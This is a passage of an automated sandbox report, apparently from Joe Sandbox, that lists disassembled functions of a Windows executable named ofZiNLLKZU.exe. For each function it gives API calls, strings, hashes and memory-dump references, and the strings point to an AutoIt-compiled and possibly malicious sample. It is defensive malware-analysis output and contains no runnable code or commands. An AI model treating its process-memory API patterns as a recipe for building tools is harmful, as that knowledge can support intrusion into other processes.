                                                                                • Instruction Fuzzy Hash: 0EF03C30005648EBDB166F66ED1C7763F62BB03372F04A215F4A5590F0C7719995DF60
                                                                                Function 00600F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$_free
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3432400110-3206640213
                                                                                • Opcode ID: 6fae9175de25deadc1985b062e9205aff4635f5785a80bf038460e6ae472fef5
                                                                                • Instruction ID: 28756b4388023eb09a5c907d0db8563f1b10d61d59028b128ddcdcb832a305f6
                                                                                • Opcode Fuzzy Hash: 6fae9175de25deadc1985b062e9205aff4635f5785a80bf038460e6ae472fef5
                                                                                • Instruction Fuzzy Hash: A5D1BD31980206DADB2C9F68C895AFBB7B6EF07300F28415AE9419F7D0D6759E81CB91
                                                                                Function 006561D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005F0242: EnterCriticalSection.KERNEL32(006A070C,006A1884,?,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F024D
                                                                                  • Part of subcall function 005F0242: LeaveCriticalSection.KERNEL32(006A070C,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F028A
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                • __Init_thread_footer.LIBCMT ref: 00656238
                                                                                  • Part of subcall function 005F01F8: EnterCriticalSection.KERNEL32(006A070C,?,?,005E8747,006A2514), ref: 005F0202
                                                                                  • Part of subcall function 005F01F8: LeaveCriticalSection.KERNEL32(006A070C,?,005E8747,006A2514), ref: 005F0235
                                                                                  • Part of subcall function 0064359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006435E4
                                                                                  • Part of subcall function 0064359C: LoadStringW.USER32(006A2390,?,00000FFF,?), ref: 0064360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                • String ID: x#j$x#j$x#j
                                                                                • API String ID: 1072379062-3560744321
                                                                                • Opcode ID: f4a0b9dcf4e2eb1b38aca775466cadda88a944dba505188e878a87dce0f39f8b
                                                                                • Instruction ID: dcfea21cd3f899911ea7f88ff861d8df842fd9c9eb0d9f99aa97e122d433a0c2
                                                                                • Opcode Fuzzy Hash: f4a0b9dcf4e2eb1b38aca775466cadda88a944dba505188e878a87dce0f39f8b
                                                                                • Instruction Fuzzy Hash: 2CC15C71A00106ABCB14DF58C895EBEBBBAFF49300F54806AF9559B391DB70ED49CB90
                                                                                Function 00608A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00608B6E
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00608B7A
                                                                                • __dosmaperr.LIBCMT ref: 00608B81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                • String ID: ._
                                                                                • API String ID: 2434981716-1383207595
                                                                                • Opcode ID: c593f07f2b443e9fff84eef48ab7fbf0809afb5e39204a5368131a49a5dada0a
                                                                                • Instruction ID: 9ed32caa1fa4001788c02024e33bc3bb64fe9bb079577ecd043efd00a830cd8d
                                                                                • Opcode Fuzzy Hash: c593f07f2b443e9fff84eef48ab7fbf0809afb5e39204a5368131a49a5dada0a
                                                                                • Instruction Fuzzy Hash: A1415B70644155AFDB28DF24CC80ABF7FA7DB86314B2841A9F8C597692DF318C038B90
                                                                                Function 00632716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0063B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006321D0,?,?,00000034,00000800,?,00000034), ref: 0063B42D
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00632760
                                                                                  • Part of subcall function 0063B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0063B3F8
                                                                                  • Part of subcall function 0063B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0063B355
                                                                                  • Part of subcall function 0063B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00632194,00000034,?,?,00001004,00000000,00000000), ref: 0063B365
                                                                                  • Part of subcall function 0063B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00632194,00000034,?,?,00001004,00000000,00000000), ref: 0063B37B
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006327CD
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063281A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: 97c426f32fb26edd6c8d789df498d52e1a6eb370a318295c5ec99d4a7f0d0743
                                                                                • Instruction ID: 2819f319e8fbcaa4c19fc2ba6ab796abc70b5016f5c841b521aeeb2643668446
                                                                                • Opcode Fuzzy Hash: 97c426f32fb26edd6c8d789df498d52e1a6eb370a318295c5ec99d4a7f0d0743
                                                                                • Instruction Fuzzy Hash: 30416D72900229BFDB10DFA4CC55AEEBBB9EF09300F105099FA55B7281DB706E45CBA0
                                                                                Function 0060172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ofZiNLLKZU.exe,00000104), ref: 00601769
                                                                                • _free.LIBCMT ref: 00601834
                                                                                • _free.LIBCMT ref: 0060183E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                                • API String ID: 2506810119-2016568469
                                                                                • Opcode ID: bde434e478a1d9399ceb54f6a54cf10b2adbfc6d534eccee854d592460fce6c7
                                                                                • Instruction ID: 69e1ecb40d24d274b18bc7b3fc3e94b0a7f2351a5bb653cfec80a1aa3a313962
                                                                                • Opcode Fuzzy Hash: bde434e478a1d9399ceb54f6a54cf10b2adbfc6d534eccee854d592460fce6c7
                                                                                • Instruction Fuzzy Hash: 97317E75A80218ABDB25DF999885DDFBBBEEF86310F10416AE4049B291D6B09F40CB90
                                                                                Function 0063C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0063C306
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 0063C34C
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006A1990,01A3EF78), ref: 0063C395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem
                                                                                • String ID: 0
                                                                                • API String ID: 135850232-4108050209
                                                                                • Opcode ID: 621ac0ffd47e81cab52213e80b9fdefc4902e2ad60116f326ec3f91bc960ae3a
                                                                                • Instruction ID: ae433856271ba1b3141a7a3ec919f2ac94ac90e5e7b8343c3e9de553d51f3edb
                                                                                • Opcode Fuzzy Hash: 621ac0ffd47e81cab52213e80b9fdefc4902e2ad60116f326ec3f91bc960ae3a
                                                                                • Instruction Fuzzy Hash: A041B1712043019FE720DF24D884B6ABBE6AF85320F048A1EF9A5A73D1D770E904CB92
                                                                                Function 00664416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0066CC08,00000000,?,?,?,?), ref: 006644AA
                                                                                • GetWindowLongW.USER32 ref: 006644C7
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006644D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: 31bc9587b0f8738a1a2a9b548f177e6e17cf9a6d95afa651500949e716fbfc28
                                                                                • Instruction ID: ed4d93406e56cec89521553109a8f79afcde986c28b3684376b0e793266bf4e7
                                                                                • Opcode Fuzzy Hash: 31bc9587b0f8738a1a2a9b548f177e6e17cf9a6d95afa651500949e716fbfc28
                                                                                • Instruction Fuzzy Hash: 5831AD31210606AFDF219E38DC46BEA7BAAEB49334F204315F975922E0DB70EC519B50
                                                                                Function 00636E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 00636EED
                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 00636F08
                                                                                • VariantClear.OLEAUT32(?), ref: 00636F12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyString
                                                                                • String ID: *jc
                                                                                • API String ID: 2173805711-2167581163
                                                                                • Opcode ID: b08feb1c77388872e553a28fe962dce4019719eefc4e4c5b32dbdb182f9ab259
                                                                                • Instruction ID: 3d08214f1d402fddd94579194d56eb1b796409a3bfc9ef8b57998f04b9b54f51
                                                                                • Opcode Fuzzy Hash: b08feb1c77388872e553a28fe962dce4019719eefc4e4c5b32dbdb182f9ab259
                                                                                • Instruction Fuzzy Hash: 1C316B71604256EBCB14AF69E8549BD3BB7BF84300F10449AF8064B3B1DB309912DBE4
                                                                                Function 0065304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0065335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00653077,?,?), ref: 00653378
                                                                                • inet_addr.WSOCK32(?), ref: 0065307A
                                                                                • _wcslen.LIBCMT ref: 0065309B
                                                                                • htons.WSOCK32(00000000), ref: 00653106
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 946324512-2422070025
                                                                                • Opcode ID: 034fba77fc26f1ad7d27b49d345bed7b276775a97960245f769bdcb8a13a7f1a
                                                                                • Instruction ID: e08e358eaf7582bd8daa9a9b63662d11a046acada5e116fb98c005932119ea48
                                                                                • Opcode Fuzzy Hash: 034fba77fc26f1ad7d27b49d345bed7b276775a97960245f769bdcb8a13a7f1a
                                                                                • Instruction Fuzzy Hash: A331D5352003169FCB20CF28C585EAA7BE2EF55799F248059ED158B392D771DE49C760
                                                                                Function 00664653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00664705
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00664713
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0066471A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 95983865a3651246773ed67ba2315ac4b58e88ebb822482c2701c2fc09a7ef1f
                                                                                • Instruction ID: ac189be1f2de8611236c43111f3b2e1e63d0f38909651b5e1578e7408773a84a
                                                                                • Opcode Fuzzy Hash: 95983865a3651246773ed67ba2315ac4b58e88ebb822482c2701c2fc09a7ef1f
                                                                                • Instruction Fuzzy Hash: B22131B5600209AFDB10DF64DC95DB73BAEEB5B3A4B040159F6009B351DB71EC51CA60
                                                                                Function 006395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 176396367-2734436370
                                                                                • Opcode ID: fe3fd3f1ef3f2d2bfa32a625a5dfbd30d7c9043aba69e7bd1017ce0f35537315
                                                                                • Instruction ID: bcbe3b0203dd5f10092c0caf51a2f40ab16a11ff7e0956836be968a842012c62
                                                                                • Opcode Fuzzy Hash: fe3fd3f1ef3f2d2bfa32a625a5dfbd30d7c9043aba69e7bd1017ce0f35537315
                                                                                • Instruction Fuzzy Hash: 61218E3210461566D331AB289C07FF777DEEF95310F004026FA4997242EBD59D81CAF1
                                                                                Function 006637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00663840
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00663850
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00663876
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 923be3badf113f537f33bba79ac63243e8c75acdecf2c8c6fc833e39561c51af
                                                                                • Instruction ID: f5fa7221b60bf3bfab919aa228370797f753c148b708f3990df146e805d978ea
                                                                                • Opcode Fuzzy Hash: 923be3badf113f537f33bba79ac63243e8c75acdecf2c8c6fc833e39561c51af
                                                                                • Instruction Fuzzy Hash: EC21B072610228BBEF219F54CC45EFB3B6FEF89760F108118F9009B290C6B1EC5287A0
                                                                                Function 006449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00644A08
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00644A5C
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,0066CC08), ref: 00644AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: f4e82aafa17f6a49a92310c8eba3e0c9c8220ad2bc33d308f52b973a9cfefcf9
                                                                                • Instruction ID: db0309c6a12a295d1786e3ff7bebab404594a2b6ceca3562a71d4eb4200e2f0b
                                                                                • Opcode Fuzzy Hash: f4e82aafa17f6a49a92310c8eba3e0c9c8220ad2bc33d308f52b973a9cfefcf9
                                                                                • Instruction Fuzzy Hash: 9E317371A00109AFDB10DF54C885EAA7BF9EF49314F148099F905DB362DB71ED45CB61
                                                                                Function 006641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0066424F
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00664264
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00664271
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: bbb37590366e489cd710bcc70b8547aaa968c2618bd778b9d536122686db6a88
                                                                                • Instruction ID: bb510d9014428bcd25e55fbbb31afb5edd482da30db4252ec4dee303c9b022e0
                                                                                • Opcode Fuzzy Hash: bbb37590366e489cd710bcc70b8547aaa968c2618bd778b9d536122686db6a88
                                                                                • Instruction Fuzzy Hash: 9811E331240208BEEF205F28CC46FEB7BAEEF86B64F110114FA55E6190D6B1D8519B14
                                                                                Function 00632F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                  • Part of subcall function 00632DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00632DC5
                                                                                  • Part of subcall function 00632DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00632DD6
                                                                                  • Part of subcall function 00632DA7: GetCurrentThreadId.KERNEL32 ref: 00632DDD
                                                                                  • Part of subcall function 00632DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00632DE4
                                                                                • GetFocus.USER32 ref: 00632F78
                                                                                  • Part of subcall function 00632DEE: GetParent.USER32(00000000), ref: 00632DF9
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00632FC3
                                                                                • EnumChildWindows.USER32(?,0063303B), ref: 00632FEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
